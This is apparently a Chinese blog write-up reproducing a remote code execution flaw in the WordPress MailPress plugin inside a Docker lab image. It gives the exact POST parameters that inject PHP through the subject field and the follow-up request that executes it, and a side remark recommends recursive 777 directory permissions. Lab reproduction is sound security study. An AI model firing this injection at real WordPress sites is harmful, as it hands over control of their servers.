WordPress-Mailpress遠程代碼執行漏洞復現

插件簡介:

Mailpress是一個比較流行的郵件插件。

插件下載Plugin Directory:https://wordpress.org/plugins/mailpress/

漏洞復現:

漏洞詳解地址:https://github.com/Medicean/VulApps/tree/master/w/wordpress/2

Docker鏡像地址:

docker pull medicean/vulapps:w_wordpress_2

啓動環境

docker run -d -p 8000:80 medicean/vulapps:w_wordpress_2

PoC 使用

使用攻擊代碼觸發漏洞

http://你的 IP 地址:端口號/wp-content/plugins/mailpress/mp-includes/action.php

首先訪問這個這個鏈接:

 

抓取上面那個頁面的數據包並修改請求方式爲post,並且加上如下post請求參數:

action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=<?php phpinfo();?>&html=&plaintext=&mail_format=standard&autosave=1

返回包裏的id記下來

然後訪問下面鏈接:

127.0.0.1:8000/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=6

 

復現成功!!!

修復方式:

及時打上官方補丁

PS:(一開始我是使用自己搭建的Wordpress,然後自己下載插件了按照正常安裝流程走【正常流程:下載插件壓縮包-->打開後臺-->選擇插件-->上傳壓縮包-->選擇安裝-->安裝】,但是我出現瞭如下幾個問題:1:上傳文件大小限制(修改php.ini文件中的上傳文件大小限制)2:目錄讀寫的問題(給wordpress所在的目錄的父母了遞歸777權限)3:上傳成功,開始安裝後出現輸入FTP賬號密碼(到這我沒弄了),4:我解壓插件壓縮包後,直接放到wordpress的插件文件內,刷新頁面後,點擊激活該插件時,出現一堆錯誤。我就放棄了,使用docker一鍵搭建。所以我推薦使用docker,沒事兒多玩玩docker!!!)

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章